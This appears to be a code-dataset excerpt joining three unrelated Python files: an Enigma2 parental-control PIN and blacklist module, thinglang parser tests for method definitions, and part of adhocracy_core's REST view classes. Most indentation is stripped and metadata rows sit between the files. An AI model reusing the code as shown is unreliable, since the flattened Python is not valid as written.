age = age and age <= 15 and age + 3 or 0
return (age and age >= int(config.ParentalControl.age.value)) or service and service in self.blacklist
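		# Note (assumption, not stated in the original code): DVB parental ratings 1..15
		# encode "minimum age = rating + 3", which is why a rating of 12 becomes age 15
		# above and the service is blocked once that age is >= config.ParentalControl.age.value.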
def isServicePlayable(self, ref, callback, session=None):
self.session = session
if self.isProtected(ref):
#Check if the session pin is cached
if self.sessionPinCached:
return True
self.callback = callback
service = ref.toCompareString()
title = 'FROM BOUQUET "userbouquet.' in service and _("this bouquet is protected by a parental control pin") or _("this service is protected by a parental control pin")
if session:
Notifications.RemovePopup("Parental control")
if self.PinDlg:
self.PinDlg.close()
self.PinDlg = session.openWithCallback(boundFunction(self.servicePinEntered, ref), PinInput, triesEntry=config.ParentalControl.retries.servicepin, pinList=self.getPinList(), service=ServiceReference(ref).getServiceName(), title=title, windowTitle=_("Parental control"), simple=False)
else:
Notifications.AddNotificationParentalControl(boundFunction(self.servicePinEntered, ref), PinInput, triesEntry=config.ParentalControl.retries.servicepin, pinList=self.getPinList(), service=ServiceReference(ref).getServiceName(), title=title, windowTitle=_("Parental control"))
return False
else:
return True
def protectService(self, service):
if service not in self.blacklist:
self.serviceMethodWrapper(service, self.addServiceToList, self.blacklist)
if config.ParentalControl.hideBlacklist.value and not self.sessionPinCached:
eDVBDB.getInstance().addFlag(eServiceReference(service), 2)
def unProtectService(self, service):
if service in self.blacklist:
self.serviceMethodWrapper(service, self.removeServiceFromList, self.blacklist)
def getProtectionLevel(self, service):
return service not in self.blacklist and -1 or 0
def isServiceProtectionBouquet(self, service):
return service in self.blacklist and TYPE_BOUQUETSERVICE in self.blacklist[service]
def getConfigValues(self):
#Read all values from configuration
self.checkPinInterval = False
self.checkPinIntervalCancel = False
self.checkSessionPin = False
self.sessionPinCached = False
self.pinIntervalSeconds = 0
self.pinIntervalSecondsCancel = 0
self.storeServicePin = config.ParentalControl.storeservicepin.value
if self.storeServicePin == "never":
pass
elif self.storeServicePin == "standby":
self.checkSessionPin = True
else:
self.checkPinInterval = True
iMinutes = float(self.storeServicePin)
iSeconds = int(iMinutes * 60)
self.pinIntervalSeconds = iSeconds
def standbyCounterCallback(self, configElement):
self.resetSessionPin()
def resetSessionPin(self):
#Reset the session pin, stop the timer
self.sessionPinCached = False
self.hideBlacklist()
def getCurrentTimeStamp(self):
return time.time()
def getPinList(self):
return [x.value for x in config.ParentalControl.servicepin]
def setSessionPinCached(self):
if self.checkSessionPin == True:
self.sessionPinCached = True
if self.checkPinInterval == True:
self.sessionPinCached = True
self.sessionPinTimer.startLongTimer(self.pinIntervalSeconds)
def servicePinEntered(self, service, result=None):
if result:
self.setSessionPinCached()
self.hideBlacklist()
self.callback(ref=service)
elif result == False:
messageText = _("The pin code you entered is wrong.")
if self.session:
self.session.open(MessageBox, messageText, MessageBox.TYPE_INFO, timeout=3)
else:
AddPopup(messageText, MessageBox.TYPE_ERROR, timeout=3)
def saveListToFile(self, sWhichList, vList):
#Replaces saveWhiteList and saveBlackList:
#I don't like to have two functions with identical code...
file = open(resolveFilename(SCOPE_CONFIG, sWhichList), 'w')
for sService, sType in vList.iteritems():
			#Only Services that are selected directly and Bouquets are saved.
#Services that are added by a bouquet are not saved.
#This is the reason for the change in self.whitelist and self.blacklist
if TYPE_SERVICE in sType or TYPE_BOUQUET in sType:
file.write(str(sService) + "\n")
file.close()
def openListFromFile(self, sWhichList):
#Replaces openWhiteList and openBlackList:
#I don't like to have two functions with identical code...
result = {}
try:
file = open(resolveFilename(SCOPE_CONFIG, sWhichList), 'r')
for x in file:
sPlain = x.strip()
self.serviceMethodWrapper(sPlain, self.addServiceToList, result)
file.close()
except:
pass
return result
def addServiceToList(self, service, type, vList):
#Replaces addWhitelistService and addBlacklistService
#The lists are not only lists of service references any more.
#They are named lists with the service as key and an array of types as value:
if service in vList:
if not type in vList[service]:
vList[service].append(type)
else:
vList[service] = [type]
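		# Sketch of the resulting structure (example values invented): after protecting a
		# bouquet and one service directly, the blacklist looks roughly like
		#   {'1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet': ['BOUQUET'],
		#    '1:0:1:1234:5678:1:C00000:0:0:0:': ['BOUQUETSERVICE', 'SERVICE']}
		# i.e. the key is the service reference and the value records why it is protected.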
def removeServiceFromList(self, service, type, vList):
#Replaces deleteWhitelistService and deleteBlacklistService
if service in vList:
if type in vList[service]:
vList[service].remove(type)
if not vList[service]:
del vList[service]
def readServicesFromBouquet(self, sBouquetSelection, formatstring):
#This method gives back a list of services for a given bouquet
from enigma import eServiceCenter, eServiceReference
serviceHandler = eServiceCenter.getInstance()
refstr = sBouquetSelection
root = eServiceReference(refstr)
list = serviceHandler.list(root)
if list is not None:
services = list.getContent("CN", True) #(servicecomparestring, name)
return services
def save(self):
self.saveListToFile(LIST_BLACKLIST, self.blacklist)
def open(self):
self.blacklist = self.openListFromFile(LIST_BLACKLIST)
self.hideBlacklist()
if not self.filesOpened:
# Reset PIN cache on standby: Use StandbyCounter- Config- Callback
config.misc.standbyCounter.addNotifier(self.standbyCounterCallback, initial_call=False)
self.filesOpened = True
def __getattr__(self, name):
# This method is called if we lack a property. I'm lazy, so
# I load the files when someone 'hits' this code
if name in ('blacklist', 'whitelist'):
if not self.filesOpened:
self.open()
return getattr(self, name)
raise AttributeError, name
def hideBlacklist(self):
if self.blacklist:
if config.ParentalControl.servicepinactive.value and config.ParentalControl.storeservicepin.value != "never" and config.ParentalControl.hideBlacklist.value and not self.sessionPinCached:
for ref in self.blacklist:
if TYPE_BOUQUET not in ref:
eDVBDB.getInstance().addFlag(eServiceReference(ref), 2)
else:
for ref in self.blacklist:
if TYPE_BOUQUET not in ref:
eDVBDB.getInstance().removeFlag(eServiceReference(ref), 2)
refreshServiceList()
| gpl-2.0 | 7,032,258,057,532,749,000 | 41.746479 | 287 | 0.765651 | false |
ytanay/thinglang | tests/parser/test_method_definition_parsing.py | 1 | 2798 | import pytest
from tests.infrastructure.test_utils import parse_local
from thinglang.lexer.values.identifier import Identifier
from thinglang.parser.definitions.method_definition import MethodDefinition
from thinglang.parser.errors import VectorReductionError
def validate_method_definition(node, name, expected_arguments=(), return_type=None):
assert isinstance(node, MethodDefinition)
assert node.name == (name if isinstance(name, Identifier) else Identifier(name))
assert node.return_type == return_type
for actual_argument, expected_argument in zip(node.arguments, expected_arguments):
assert actual_argument.value == expected_argument[0]
assert actual_argument.type.value == expected_argument[1]
def test_simple_method_definition():
method = parse_local("does say_hello")
validate_method_definition(method, 'say_hello')
def test_simple_constructor_definition():
method = parse_local("setup")
parse_local("thing container").attach(method)
validate_method_definition(method, Identifier.constructor(), return_type=Identifier('container'))
def test_constructor_arguments():
method = parse_local("setup with text name, number age")
parse_local("thing container").attach(method)
validate_method_definition(method, Identifier.constructor(), [('name', 'text'), ('age', 'number')], Identifier('container'))
def test_method_definition_return_type():
method = parse_local("does compute returns number")
validate_method_definition(method, 'compute', (), Identifier('number'))
def test_single_argument_method_definition():
method = parse_local("does say_hello with text message")
validate_method_definition(method, 'say_hello', [('message', 'text')])
def test_multiple_argument_method_definition():
method = parse_local("does say_hello with text message, number count")
validate_method_definition(method, 'say_hello', [('message', 'text'), ('count', 'number')])
def test_combined_method_definition():
method = parse_local("does say_hello with text message, number count returns text")
validate_method_definition(method, 'say_hello', [('message', 'text'), ('count', 'number')], Identifier('text'))
INVALID_SYNTAX_EXAMPLES = [
"does say_hello with text",
"does say_hello with text name, number",
"does say_hello with text name age",
"does say_hello with text number , , age",
"does say_hello with number, age",
"does say_hello with number 2",
"does say_hello returns number returns text",
"does say_hello returns number with number a",
"setup returns number"
]
@pytest.mark.parametrize('source', INVALID_SYNTAX_EXAMPLES)
def test_method_definition_argument_invalid_syntax(source):
with pytest.raises(VectorReductionError):
parse_local(source)
| mit | -3,130,915,743,327,870,000 | 38.408451 | 128 | 0.725518 | false |
fhartwig/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/rest/views.py | 1 | 46505 | """GET/POST/PUT requests processing."""
from collections import defaultdict
from copy import deepcopy
from logging import getLogger
from colander import Invalid
from colander import MappingSchema
from colander import SchemaNode
from colander import SequenceSchema
from substanced.interfaces import IUserLocator
from substanced.util import find_service
from pyramid.httpexceptions import HTTPMethodNotAllowed
from pyramid.httpexceptions import HTTPGone
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.request import Request
from pyramid.view import view_config
from pyramid.view import view_defaults
from pyramid.security import remember
from pyramid.traversal import resource_path
from zope.interface.interfaces import IInterface
from zope.interface import Interface
from adhocracy_core.caching import set_cache_header
from adhocracy_core.events import ResourceSheetModified
from adhocracy_core.interfaces import IResource
from adhocracy_core.interfaces import IItem
from adhocracy_core.interfaces import IItemVersion
from adhocracy_core.interfaces import ISimple
from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import IPool
from adhocracy_core.interfaces import ILocation
from adhocracy_core.resources.asset import IAsset
from adhocracy_core.resources.asset import IAssetDownload
from adhocracy_core.resources.asset import IAssetsService
from adhocracy_core.resources.asset import validate_and_complete_asset
from adhocracy_core.resources.principal import IUsersService
from adhocracy_core.resources.principal import IPasswordReset
from adhocracy_core.resources.badge import IBadgeAssignmentsService
from adhocracy_core.rest.schemas import ResourceResponseSchema
from adhocracy_core.rest.schemas import ItemResponseSchema
from adhocracy_core.rest.schemas import POSTActivateAccountViewRequestSchema
from adhocracy_core.rest.schemas import POSTItemRequestSchema
from adhocracy_core.rest.schemas import POSTLoginEmailRequestSchema
from adhocracy_core.rest.schemas import POSTLoginUsernameRequestSchema
from adhocracy_core.rest.schemas import POSTMessageUserViewRequestSchema
from adhocracy_core.rest.schemas import POSTCreatePasswordResetRequestSchema
from adhocracy_core.rest.schemas import POSTPasswordResetRequestSchema
from adhocracy_core.rest.schemas import POSTReportAbuseViewRequestSchema
from adhocracy_core.rest.schemas import POSTResourceRequestSchema
from adhocracy_core.rest.schemas import PUTResourceRequestSchema
from adhocracy_core.rest.schemas import GETPoolRequestSchema
from adhocracy_core.rest.schemas import GETItemResponseSchema
from adhocracy_core.rest.schemas import GETResourceResponseSchema
from adhocracy_core.rest.schemas import options_resource_response_data_dict
from adhocracy_core.rest.schemas import add_arbitrary_filter_nodes
from adhocracy_core.rest.exceptions import error_entry
from adhocracy_core.schema import AbsolutePath
from adhocracy_core.schema import References
from adhocracy_core.sheets.asset import retrieve_asset_file
from adhocracy_core.sheets.badge import get_assignable_badges
from adhocracy_core.sheets.badge import IBadgeAssignment
from adhocracy_core.sheets.metadata import IMetadata
from adhocracy_core.sheets.metadata import is_older_than
from adhocracy_core.sheets.workflow import IWorkflowAssignment
from adhocracy_core.sheets.principal import IPasswordAuthentication
from adhocracy_core.sheets.pool import IPool as IPoolSheet
from adhocracy_core.sheets.principal import IUserBasic
from adhocracy_core.utils import extract_events_from_changelog_metadata
from adhocracy_core.utils import get_sheet
from adhocracy_core.utils import get_user
from adhocracy_core.utils import is_batchmode
from adhocracy_core.utils import strip_optional_prefix
from adhocracy_core.utils import to_dotted_name
from adhocracy_core.utils import unflatten_multipart_request
from adhocracy_core.resources.root import IRootPool
from adhocracy_core.workflows.schemas import create_workflow_meta_schema
logger = getLogger(__name__)
def respond_if_blocked(context, request):
"""
Set 410 Gone and construct response if resource is deleted or hidden.
    Otherwise, or if the request method is not HEAD, GET or POST, return None.
"""
from adhocracy_core.utils import get_reason_if_blocked
if request.method not in ['HEAD', 'GET', 'POST']:
return
block_reason = get_reason_if_blocked(context)
if block_reason is not None:
raise HTTPGone(detail=block_reason)
def validate_post_root_versions(context, request: Request):
"""Check and transform the 'root_version' paths to resources."""
# TODO: make this a colander validator and move to schema.py
# use the catalog to find IItemversions
root_versions = request.validated.get('root_versions', [])
valid_root_versions = []
for root in root_versions:
if not IItemVersion.providedBy(root):
error = 'This resource is not a valid ' \
'root version: {}'.format(request.resource_url(root))
request.errors.append(error_entry('body', 'root_versions', error))
continue
valid_root_versions.append(root)
request.validated['root_versions'] = valid_root_versions
def validate_request_data(context: ILocation, request: Request,
schema=MappingSchema(), extra_validators=[]):
""" Validate request data.
:param context: passed to validator functions
:param request: passed to validator functions
:param schema: Schema to validate. Data to validate is extracted from the
request.body. For schema nodes with attribute `location` ==
`querystring` the data is extracted from the query string.
The validated data (dict or list) is stored in the
`request.validated` attribute.
The `None` value is allowed to disable schema validation.
:param extra_validators: Functions called after schema validation.
The passed arguments are `context` and `request`.
The should append errors to `request.errors` and
validated data to `request.validated`.
:raises HTTPBadRequest: HTTP 400 for bad request data.
"""
parent = context if request.method == 'POST' else context.__parent__
workflow = _get_workflow(context, request)
schema_with_binding = schema.bind(context=context,
request=request,
registry=request.registry,
workflow=workflow,
parent_pool=parent)
body = {}
if request.content_type == 'multipart/form-data':
body = unflatten_multipart_request(request)
if request.content_type == 'application/json':
body = _extract_json_body(request)
validate_user_headers(request)
qs = _extract_querystring(request)
validate_body_or_querystring(body, qs, schema_with_binding, context,
request)
_validate_extra_validators(extra_validators, context, request)
if request.errors:
request.validated = {}
raise HTTPBadRequest()
def _get_workflow(context: IResource, request: Request):
if request.method == 'POST':
return
get_workflow = request.registry.content.get_workflow
workflow = get_workflow(context)
return workflow
def _extract_json_body(request: Request) -> object:
json_body = {}
if request.body == '':
request.body = '{}'
try:
json_body = request.json_body
except (ValueError, TypeError) as err:
error = error_entry('body', None,
                            'Invalid JSON request body: {}'.format(err))
request.errors.append(error)
return json_body
def _extract_querystring(request: Request) -> dict:
parameters = {}
for key, value_encoded in request.GET.items():
import json
try:
value = json.loads(value_encoded)
except (ValueError, TypeError):
value = value_encoded
parameters[key] = value
return parameters
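# A sketch of the decoding above (example request invented, not from the original):
#   GET /adhocracy?depth=2&count=true&sort=name
# yields {'depth': 2, 'count': True, 'sort': 'name'}: values that parse as JSON are
# decoded, anything else is kept as the raw query-string value.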
def validate_user_headers(request: Request):
"""
Validate the user headers.
If the request has a 'X-User-Path' and/or 'X-User-Token' header, we
ensure that the session takes belongs to the user and is not expired.
"""
headers = request.headers
if 'X-User-Path' in headers or 'X-User-Token' in headers:
if get_user(request) is None:
error = error_entry('header', 'X-User-Token', 'Invalid user token')
request.errors.append(error)
def validate_body_or_querystring(body, qs: dict, schema: MappingSchema,
context: IResource, request: Request):
"""Validate the querystring if this is a GET request, the body otherwise.
This allows using just a single schema for all kinds of requests.
"""
if isinstance(schema, GETPoolRequestSchema):
try:
schema = add_arbitrary_filter_nodes(qs,
schema,
context,
request.registry)
except Invalid as err: # pragma: no cover
_add_colander_invalid_error_to_request(err, request,
location='querystring')
if request.method.upper() == 'GET':
_validate_schema(qs, schema, request,
location='querystring')
else:
_validate_schema(body, schema, request, location='body')
def _validate_schema(cstruct: object, schema: MappingSchema, request: Request,
location='body'):
"""Validate that the :term:`cstruct` data is conform to the given schema.
:param request: request with list like `errors` attribute to append errors
and the dictionary attribute `validated` to add validated
data.
:param location: filter schema nodes depending on the `location` attribute.
The default value is `body`.
"""
if isinstance(schema, SequenceSchema):
_validate_list_schema(schema, cstruct, request, location)
elif isinstance(schema, MappingSchema):
_validate_dict_schema(schema, cstruct, request, location)
else:
error = 'Validation for schema {} is unsupported.'.format(str(schema))
raise(Exception(error))
def _validate_list_schema(schema: SequenceSchema, cstruct: list,
request: Request, location='body'):
if location != 'body': # for now we only support location == body
return
child_cstructs = schema.cstruct_children(cstruct)
try:
request.validated = schema.deserialize(child_cstructs)
except Invalid as err:
_add_colander_invalid_error_to_request(err, request, location)
def _validate_dict_schema(schema: MappingSchema, cstruct: dict,
request: Request, location='body'):
validated = {}
try:
validated = schema.deserialize(cstruct)
except Invalid as err:
for child in err.children:
_add_colander_invalid_error_to_request(child, request, location)
if not err.children:
_add_colander_invalid_error_to_request(err, request, location)
request.validated.update(validated)
def _add_colander_invalid_error_to_request(error: Invalid, request: Request,
location: str):
for name, msg in error.asdict().items():
request.errors.append(error_entry(location, name, msg))
def _validate_extra_validators(validators: list, context, request: Request):
"""Run `validators` functions. Assuming schema validation run before."""
if request.errors:
return
for val in validators:
val(context, request)
class RESTView:
"""Class stub with request data validation support.
Subclasses must implement the wanted request methods
and configure the pyramid view::
@view_defaults(
renderer='json',
context=IResource,
)
class MySubClass(RESTView):
validation_GET = (MyColanderSchema, [my_extra_validation_function])
@view_config(request_method='GET')
def get(self):
...
"""
validation_OPTIONS = (None, [])
validation_HEAD = (None, [])
validation_GET = (None, [])
validation_PUT = (None, [])
validation_POST = (None, [])
def __init__(self, context, request):
"""Initialize self."""
self.context = context
"""Context Resource."""
self.request = request
""":class:`pyramid.request.Request`."""
respond_if_blocked(context, request)
set_cache_header(context, request)
schema_class, validators = _get_schema_and_validators(self, request)
validate_request_data(context, request,
schema=schema_class(),
extra_validators=validators)
def options(self) -> dict:
"""Return options for view.
        Note: This default implementation currently only exists in order to
satisfy the preflight request, which browsers do in CORS situations
before doing an actual POST request. Subclasses still have to
configure the view and delegate to this implementation explicitly if
they want to use it.
"""
return {}
def get(self) -> dict:
"""HTTP GET."""
raise HTTPMethodNotAllowed()
def put(self) -> dict:
""""HTTP PUT."""
raise HTTPMethodNotAllowed()
def post(self) -> dict:
"""HTTP POST."""
raise HTTPMethodNotAllowed()
def delete(self) -> dict:
"""HTTP delete."""
raise HTTPMethodNotAllowed()
def _build_updated_resources_dict(self) -> dict:
"""Utility method used by several subclasses."""
result = defaultdict(list)
changelog_meta = self.request.registry.changelog.values()
for meta in changelog_meta:
events = extract_events_from_changelog_metadata(meta)
for event in events:
result[event].append(meta.resource)
return result
def _get_schema_and_validators(view_class, request: Request) -> tuple:
http_method = request.method.upper()
validation_attr = 'validation_' + http_method
schema, validators = getattr(view_class, validation_attr, (None, []))
return schema or MappingSchema, validators
@view_defaults(
renderer='json',
context=IResource,
)
class ResourceRESTView(RESTView):
"""Default view for Resources, implements get and options."""
def __init__(self, context, request):
"""Initialize self."""
super().__init__(context, request)
self.registry = request.registry.content
""":class:`pyramid.registry.Registry`."""
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Get possible request/response data structures and http methods."""
context = self.context
request = self.request
registry = self.registry
empty = {} # tiny performance tweak
cstruct = deepcopy(options_resource_response_data_dict)
if request.has_permission('edit_some', context):
edits = self.registry.get_sheets_edit(context, request)
put_sheets = [(s.meta.isheet.__identifier__, empty) for s in edits]
if put_sheets:
put_sheets_dict = dict(put_sheets)
self._add_metadata_edit_permission_info(put_sheets_dict)
self._add_workflow_edit_permission_info(put_sheets_dict, edits)
cstruct['PUT']['request_body']['data'] = put_sheets_dict
else:
del cstruct['PUT']
else:
del cstruct['PUT']
if request.has_permission('view', context):
views = self.registry.get_sheets_read(context, request)
get_sheets = [(s.meta.isheet.__identifier__, empty) for s in views]
if get_sheets:
cstruct['GET']['response_body']['data'] = dict(get_sheets)
else:
del cstruct['GET']
else:
del cstruct['GET']
is_users = IUsersService.providedBy(context) \
and request.has_permission('create_user', self.context)
# TODO move the is_user specific part the UsersRestView
if request.has_permission('create', self.context) or is_users:
addables = registry.get_resources_meta_addable(context, request)
if addables:
for resource_meta in addables:
iresource = resource_meta.iresource
resource_typ = iresource.__identifier__
creates = registry.get_sheets_create(context, request,
iresource)
sheet_typs = [s.meta.isheet.__identifier__ for s in
creates]
sheets_dict = dict.fromkeys(sheet_typs, empty)
post_data = {'content_type': resource_typ,
'data': sheets_dict}
cstruct['POST']['request_body'].append(post_data)
else:
del cstruct['POST']
else:
del cstruct['POST']
return cstruct
def _add_metadata_edit_permission_info(self, cstruct: dict):
"""Add info if a user may set the deleted/hidden metadata fields."""
if IMetadata.__identifier__ not in cstruct:
return
# everybody who can PUT metadata can delete the resource
permission_info = {'deleted': [True, False]}
if self.request.has_permission('hide', self.context):
permission_info['hidden'] = [True, False]
cstruct[IMetadata.__identifier__] = permission_info
def _add_workflow_edit_permission_info(self, cstruct: dict, edit_sheets):
"""Add info if a user may set the workflow_state workflow field."""
workflow_sheets = [s for s in edit_sheets
if s.meta.isheet.isOrExtends(IWorkflowAssignment)]
for sheet in workflow_sheets:
workflow = sheet.get()['workflow']
if workflow is None:
states = []
else:
states = workflow.get_next_states(self.context, self.request)
isheet = sheet.meta.isheet
cstruct[isheet.__identifier__] = {'workflow_state': states}
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data (unless deleted or hidden)."""
schema = GETResourceResponseSchema().bind(request=self.request,
context=self.context)
cstruct = schema.serialize()
cstruct['data'] = self._get_sheets_data_cstruct()
return cstruct
def _get_sheets_data_cstruct(self):
queryparams = self.request.validated if self.request.validated else {}
sheets_view = self.registry.get_sheets_read(self.context,
self.request)
data_cstruct = {}
for sheet in sheets_view:
key = sheet.meta.isheet.__identifier__
if sheet.meta.isheet is IPoolSheet:
cstruct = sheet.get_cstruct(self.request, params=queryparams)
else:
cstruct = sheet.get_cstruct(self.request)
data_cstruct[key] = cstruct
return data_cstruct
@view_defaults(
renderer='json',
context=ISimple,
)
class SimpleRESTView(ResourceRESTView):
"""View for simples (non versionable), implements get, options and put."""
validation_PUT = (PUTResourceRequestSchema, [])
@view_config(request_method='PUT',
permission='edit_some',
accept='application/json')
def put(self) -> dict:
"""Edit resource and get response data."""
sheets = self.registry.get_sheets_edit(self.context, self.request)
appstructs = self.request.validated.get('data', {})
for sheet in sheets:
name = sheet.meta.isheet.__identifier__
if name in appstructs:
sheet.set(appstructs[name],
request=self.request)
appstruct = {}
if not is_batchmode(self.request): # pragma: no branch
appstruct[
'updated_resources'] = self._build_updated_resources_dict()
schema = ResourceResponseSchema().bind(request=self.request,
context=self.context)
cstruct = schema.serialize(appstruct)
return cstruct
@view_defaults(
renderer='json',
context=IPool,
)
class PoolRESTView(SimpleRESTView):
"""View for Pools, implements get, options, put and post."""
validation_GET = (GETPoolRequestSchema, [])
validation_POST = (POSTResourceRequestSchema, [])
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data."""
# This delegation method is necessary since otherwise validation_GET
# won't be found.
return super().get()
def build_post_response(self, resource) -> dict:
"""Build response data structure for a POST request. """
appstruct = {}
if IItem.providedBy(resource):
appstruct['first_version_path'] = self._get_first_version(resource)
schema = ItemResponseSchema().bind(request=self.request,
context=resource)
else:
schema = ResourceResponseSchema().bind(request=self.request,
context=resource)
if not is_batchmode(self.request):
appstruct[
'updated_resources'] = self._build_updated_resources_dict()
return schema.serialize(appstruct)
def _get_first_version(self, item: IItem) -> IItemVersion:
for child in item.values():
if IItemVersion.providedBy(child):
return child
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
iresource = self.request.validated['content_type']
resource_type = iresource.__identifier__
appstructs = self.request.validated.get('data', {})
creator = get_user(self.request)
resource = self.registry.create(resource_type,
self.context,
creator=creator,
appstructs=appstructs,
request=self.request,
)
return self.build_post_response(resource)
@view_config(request_method='PUT',
permission='edit_some',
accept='application/json')
def put(self) -> dict:
"""HTTP PUT."""
return super().put()
@view_defaults(
renderer='json',
context=IItem,
)
class ItemRESTView(PoolRESTView):
"""View for Items and ItemVersions, overwrites GET and POST handling."""
validation_POST = (POSTItemRequestSchema, [validate_post_root_versions])
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data."""
schema = GETItemResponseSchema().bind(request=self.request,
context=self.context)
appstruct = {}
first_version = self._get_first_version(self.context)
if first_version is not None:
appstruct['first_version_path'] = first_version
cstruct = schema.serialize(appstruct)
cstruct['data'] = self._get_sheets_data_cstruct()
return cstruct
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self):
"""Create new resource and get response data.
For :class:`adhocracy_core.interfaces.IItemVersion`:
If a `new version` is already created in this transaction we don't want
to create a new one. Instead we modify the existing one.
        This is needed to make :class:`adhocracy_core.rest.batchview.BatchView`
work.
"""
batchmode = is_batchmode(self.request)
validated = self.request.validated
iresource = validated['content_type']
resource_type = iresource.__identifier__
appstructs = validated.get('data', {})
creator = get_user(self.request)
root_versions = validated.get('root_versions', [])
last_new_version = validated.get('_last_new_version_in_transaction',
None)
if last_new_version is not None: # this only happens in batch request
sheets = self.registry.get_sheets_create(last_new_version,
self.request)
appstructs = self.request.validated.get('data', {})
for sheet in sheets:
name = sheet.meta.isheet.__identifier__
if name in appstructs: # pragma: no branch
sheet.set(appstructs[name],
request=self.request)
resource = last_new_version
else:
resource = self.registry.create(resource_type,
self.context,
appstructs=appstructs,
creator=creator,
root_versions=root_versions,
request=self.request,
is_batchmode=batchmode,
)
return self.build_post_response(resource)
@view_defaults(
renderer='json',
context=IBadgeAssignmentsService,
)
class BadgeAssignmentsRESTView(PoolRESTView):
"""REST view for the badge assignment."""
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""HTTP GET."""
return super().get()
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self):
"""HTTP POST."""
return super().post()
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Get possible request/response data structures and http methods."""
cstruct = super().options()
if 'POST' not in cstruct:
return cstruct
for info in cstruct['POST']['request_body']:
if IBadgeAssignment.__identifier__ not in info['data']:
continue
assignables = get_assignable_badges(self.context, self.request)
urls = [self.request.resource_url(x) for x in assignables]
info['data'][IBadgeAssignment.__identifier__] =\
{'badge': urls}
return cstruct
@view_defaults(
renderer='json',
context=IUsersService,
)
class UsersRESTView(PoolRESTView):
"""View the IUsersService pool overwrites POST handling."""
@view_config(request_method='POST',
permission='create_user',
accept='application/json')
def post(self):
"""HTTP POST."""
return super().post()
@view_defaults(
renderer='json',
context=IAssetsService,
)
class AssetsServiceRESTView(PoolRESTView):
"""View allowing multipart requests for asset upload."""
@view_config(request_method='POST',
permission='create_asset',
accept='multipart/form-data')
def post(self):
"""HTTP POST."""
return super().post()
@view_defaults(
renderer='json',
context=IAsset,
)
class AssetRESTView(SimpleRESTView):
"""View for assets, allows PUTting new versions via multipart."""
@view_config(request_method='PUT',
permission='create_asset',
accept='multipart/form-data')
def put(self) -> dict:
"""HTTP PUT."""
result = super().put()
validate_and_complete_asset(self.context, self.request.registry)
return result
@view_defaults(
renderer='json',
context=IAssetDownload,
)
class AssetDownloadRESTView(SimpleRESTView):
"""
View for downloading assets as binary blobs.
Allows GET, but no POST or PUT.
"""
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get asset data (unless deleted or hidden)."""
file = retrieve_asset_file(self.context, self.request.registry)
response = file.get_response(self.context, self.request.registry)
self.ensure_caching_headers(response)
return response
def ensure_caching_headers(self, response):
"""Ensure cache headers for custom `response` objects."""
response.cache_control = self.request.response.cache_control
response.etag = self.request.response.etag
response.last_modified = self.request.response.last_modified
def put(self) -> dict:
"""HTTP PUT."""
raise HTTPMethodNotAllowed()
def post(self) -> dict:
"""HTTP POST."""
raise HTTPMethodNotAllowed()
@view_defaults(
renderer='json',
context=IRootPool,
name='meta_api'
)
class MetaApiView(RESTView):
"""Access to metadata about the API specification of this installation.
Returns a JSON document describing the existing resources and sheets.
"""
def _describe_resources(self, resources_meta):
"""Build a description of the resources registered in the system.
Args:
resources_meta (dict): mapping from iresource interfaces to metadata
Returns:
resource_map (dict): a dict (suitable for JSON serialization) that
describes all the resources registered in the
system.
"""
resource_map = {}
for iresource, resource_meta in resources_meta.items():
prop_map = {}
# super types
prop_map['super_types'] = _get_base_ifaces(iresource,
root_iface=IResource)
# List of sheets
sheets = []
sheets.extend(resource_meta.basic_sheets)
sheets.extend(resource_meta.extended_sheets)
prop_map['sheets'] = [to_dotted_name(s) for s in sheets]
# Main element type if this is a pool or item
if resource_meta.item_type:
prop_map['item_type'] = to_dotted_name(resource_meta.item_type)
# Other addable element types
if resource_meta.element_types:
element_names = []
for typ in resource_meta.element_types:
element_names.append(to_dotted_name(typ))
prop_map['element_types'] = element_names
resource_map[to_dotted_name(iresource)] = prop_map
return resource_map
def _describe_sheets(self, sheet_metadata):
"""Build a description of the sheets used in the system.
Args:
sheet_metadata: mapping of sheet names to metadata about them, as
returned by the registry
Returns:
A dict (suitable for JSON serialization) that describes the sheets
and their fields
"""
sheet_map = {}
for isheet, sheet_meta in sheet_metadata.items():
# readable and create_mandatory flags are currently defined for
# the whole sheet, but we copy them as attributes into each field
# definition, since this might change in the future.
# (The _sheet_field_readable method already allows overwriting the
# readable flag on a field-by-field basis, but it's somewhat
# ad-hoc.)
fields = []
# Create field definitions
for node in sheet_meta.schema_class().children:
fieldname = node.name
valuetype = type(node)
valuetyp = type(node.typ)
typ = to_dotted_name(valuetyp)
containertype = None
targetsheet = None
readonly = getattr(node, 'readonly', False)
if issubclass(valuetype, References):
empty_appstruct = node.bind().default
containertype = empty_appstruct.__class__.__name__
typ = to_dotted_name(AbsolutePath)
elif isinstance(node, SequenceSchema):
containertype = 'list'
typ = to_dotted_name(type(node.children[0]))
elif valuetype is not SchemaNode:
# If the outer type is not a container and it's not
# just a generic SchemaNode, we use the outer type
# as "valuetype" since it provides most specific
# information (e.g. "adhocracy_core.schema.Identifier"
# instead of just "SingleLine")
typ = to_dotted_name(valuetype)
if hasattr(node, 'reftype'):
# set targetsheet
reftype = node.reftype
target_isheet = reftype.getTaggedValue('target_isheet')
source_isheet = reftype.getTaggedValue('source_isheet')
isheet_ = source_isheet if node.backref else target_isheet
targetsheet = to_dotted_name(isheet_)
typ_stripped = strip_optional_prefix(typ, 'colander.')
fielddesc = {
'name': fieldname,
'valuetype': typ_stripped,
'create_mandatory':
False if readonly else sheet_meta.create_mandatory,
'editable': False if readonly else sheet_meta.editable,
'creatable': False if readonly else sheet_meta.creatable,
'readable': sheet_meta.readable,
}
if containertype is not None:
fielddesc['containertype'] = containertype
if targetsheet is not None:
fielddesc['targetsheet'] = targetsheet
fields.append(fielddesc)
super_types = _get_base_ifaces(isheet, root_iface=ISheet)
